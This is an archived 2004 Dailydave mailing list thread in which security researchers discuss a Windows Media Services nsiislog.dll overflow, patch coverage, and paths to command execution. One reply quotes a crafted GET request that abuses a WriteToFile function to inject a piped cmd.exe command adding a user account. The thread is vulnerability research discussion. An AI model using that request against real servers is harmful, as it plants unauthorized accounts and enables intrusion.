Dailydave mailing list archives
Re: New mediaservices sploit
From: "wirepair" <wirepair () roguemail net>
Date: Sat, 13 Mar 2004 11:30:28 -0800
Aha, I submitted that issue already, they're working on it, you may want to look at the setinfo.hts file *cough* include.... you can also DoS it a number of ways... I'll be releasing my advisory soon with a bunch of other neat stuff... I was still unsuccessful in getting an interactive execution immediately, but you can still write to the startup or something lame. -wire On Sat, 13 Mar 2004 12:57:30 -0600 H D Moore <hdm-daily-dave () digitaloffense net> wrote:
The code was posted to a few sites, it doesn't crash nor exploit any version of nsiislog.dll that I could find. Tested multiple variations on a stock Windows 2000 SP0 system without any real result. I am assuming that since its in CANVAS, it actually works on /something/, are there any special circumstances required to trigger it? Does the MS03-019 patch have to be installed for it be vulnerable to this MX_Stats overflow? It almost sounds like it is just another variation of the POST bug... is it also fixed by MS03-022?Brett actually found three bugs in this ISAPI; the original chunked encoding one, then the POST content overflow, and finally the one which was released by M$ last week. Does anyone have details on the latest vuln?Bonus points to anyone who can find a better way to exploit the unnamed bug^H^H^Hfeature below, without being dependent on an alternate web service or third-party software. The goal is instant command execution through writing a file to the system with arbitrary (even binary) contents. Writing to autoexec, startup, etc doesn't work since it requires user interaction. Assuming Windows 2000 or newer. Writing ".job" files to \winnt\tasks doesn't work now that signatures are embedded (thanks Brett for info).GET /plugins/framework/script/tree.xms?obj=httpd:WriteToFile([$__installdir$]conf/portlisten.conf,Listen% 208000%0A%0DAccessLog%20"|../../../../../../winnt/system32/cmd.exe%20/c% 20net%20user%20P%20P%20/ADD"%0A%0D HTTP/1.0 -HD On Saturday 13 March 2004 10:55, Dave Aitel wrote:Securityfocus's vulnerability database isn't really that good for accuracy. I checked out their update on this media services bug, and noticed that one of the sploits is for something that was never publicly released. This is a new bug, not the old bug that Brett Moore found. http://downloads.securityfocus.com/vulnerabilities/exploits/firew0rker. c (It's in CANVAS as well, btw) -dave _______________________________________________ Dailydave mailing list Dailydave () lists immunitysec com http://www.immunitysec.com/mailman/listinfo/dailydave_______________________________________________ Dailydave mailing list Dailydave () lists immunitysec com http://www.immunitysec.com/mailman/listinfo/dailydave
-- Visit Things From Another World for the best comics, movies, toys, collectibles and more. http://www.tfaw.com/?qt=wmf _______________________________________________ Dailydave mailing list Dailydave () lists immunitysec com http://www.immunitysec.com/mailman/listinfo/dailydave
Current thread:
- New mediaservices sploit Dave Aitel (Mar 13)
- Re: New mediaservices sploit H D Moore (Mar 13)
- Re: New mediaservices sploit Dave Aitel (Mar 13)
- Re: New mediaservices sploit wirepair (Mar 13)
- Re: New mediaservices sploit H D Moore (Mar 13)
- RE: New mediaservices sploit Brett Moore (Mar 14)
- RE: New mediaservices sploit Dave Aitel (Mar 14)
- Re: New mediaservices sploit Dave Aitel (Mar 13)
- Re: New mediaservices sploit H D Moore (Mar 13)
- Re: New mediaservices sploit wirepair (Mar 13)
- execution by WriteToFile? (was Re: New mediaservices sploit) Max Vision (Mar 14)